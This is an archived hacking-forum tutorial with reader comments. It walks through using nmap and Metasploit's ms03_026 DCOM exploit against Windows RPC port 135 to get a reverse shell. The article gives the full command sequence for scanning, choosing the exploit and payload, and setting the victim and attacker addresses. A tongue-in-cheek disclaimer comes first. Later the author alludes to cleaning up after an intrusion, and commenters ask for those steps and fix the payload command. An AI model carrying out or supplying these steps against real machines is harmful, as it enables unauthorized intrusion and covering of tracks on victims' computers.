Follow us on Twitter!
Don't judge the unknown - Grindordie
Thursday, April 24, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 22
Guests Online: 19
Members Online: 3

Registered Members: 82905
Newest Member: BLckLIght
Latest Articles

exploiting Windows, Linux, and MACs

Arrow Image an explanation of how to use exploits with msf, in order to get a payload on a remote machine (i.e. reverse shell, immediate root, etc..)



*******************************************************************
For any evil genius out there, I just want to tell you that this tutorial is for educational purposes only, and should be used with care, and not against ANY server without the permission of the admin. ( * cough-cough * ) must be the bird flu.
*******************************************************************

INTRODUCTION
As you might already know, many computers today come with unconfigured software packages which might compromise the PCs security. The software run by these computers uses PORTS (you can think of them as medium through which information is send to, and from). Ports associated with software allow an attacker to exploit the software flaw; thus giving a person ROOT (admin). Now how do you do this, you might ask. That's why you should read on furiously, in order to find out.

PORT SCANNING
One has to scan the computer they want to "hack", if they know the IP address. This is usually done with a port scanner, like NMAP (www.insecure.org/nmap/). In order to scan your whole network, for example a Verizon DSL home LAN, I would use:
nmap -v 192.168.1.* (with root status)
and if you see your target in the list, then procede to focus your scan on their IP address, but this time with more options. I usually do:
nmap -v -sS -P0 -nAF 192.168.1.46 (just as an example of a victim I'm scanning in my LAN)
The goal here is to find open ports.
When scanning windows machines, I look for port 135 - Microsoft Remote Procedure Call (RPC) service, and try to exploit the service running behind it.

METASPLOIT FRAMEWORK
Let's say that port 135 is open. We will proceed to exploit the software running behind it. In order to do that, we download the metasploit framework, from:
http://www.metasp. . .loads.html
Then install it, and go to the directory containing it, If launched properly, it should say (in ur shell or CMD prompt):
MSF >
Type in:
msfupdate Updates your exploits, and payloads
show exploits This should list all available exploits
info msrpc_dcom_ms03_026 - info about the exploit
use msrpc_dcom_ms03_026 - use the expoit
show payloads - the payload we want to generate
info win32_reverse_ord - info about the payload
use win32_reverse_ord use this payload
set RHOST 192.168.1.46 - victim's IP address
set RPORT 135 - victim's port to use
set LHOST 192.168.1.1- attacker's IP address
set LPORT 4321- attacker's port to report to
show options - information about the attack

when you're SURE/ready to perform your attack, type:
exploit - BOOM! You're IN, my friend -- if all went well.

Type in:
ipconfig /all - to see the IP address you're using...
it should say 192.168.1.46 (just as an example of the victim's IP address).

CONCLUSION
I'll assume you know how clean up after the intrusion. So, be smart and careful about anything you do to the remote PC (since, you're ROOT).

NOTE
I hope you enjoyed my article (this is my first, so please take it easy on the ratings for me... I promise to make clearer ones next time. Also, this is only one exploits. There are many combinations you can use to "hack" Linux, Mac, and Windows boxes. In other words, this is really applicable when it comes to gaining root, or executing arbitrary code on a remote machine.

Comments

godon April 01 2006 - 15:17:28
mm i liked it.. but how about writing the how to clean up after the intrusion. part Pfft ? at least for the case where the victim is using linux.. or windows or anything
Wsoprulz1299on April 01 2006 - 22:48:56
pointless article really :\ doesnt go into any real detail about anythingShock
Wsoprulz1299on April 01 2006 - 22:49:00
pointless article really :\ doesnt go into any real detail about anything
Darth_Pengoon April 02 2006 - 13:03:30
Wsoprulz1299: According to Microsoft, it's by design Pfft
feggeon April 16 2006 - 14:08:01
well i am at the same levelWink
d0ct0ron May 26 2007 - 12:57:51
I dont get the "use win32_reverse_ord" command to work, you sure thats how you use a payload? Or am i doing it wrong? Smile
d0ct0ron May 26 2007 - 13:11:15
Nwm it was supposed to be "set PAYLOAD use win32_reverse_ord"
Zephyr_Pureon October 12 2007 - 20:40:13
It's an alright article describing a single vector of attack. A little more background on what the exploit actually does, why RPC is vulnerable, and changing the title to reflect the coverage of a single attack would've made it much better. Anyways, it did what it set out to do, so I can't rate it anything less than good.
Post Comment

Sorry.

You must have completed the challenge Basic 1 and have 100 points or more, to be able to post.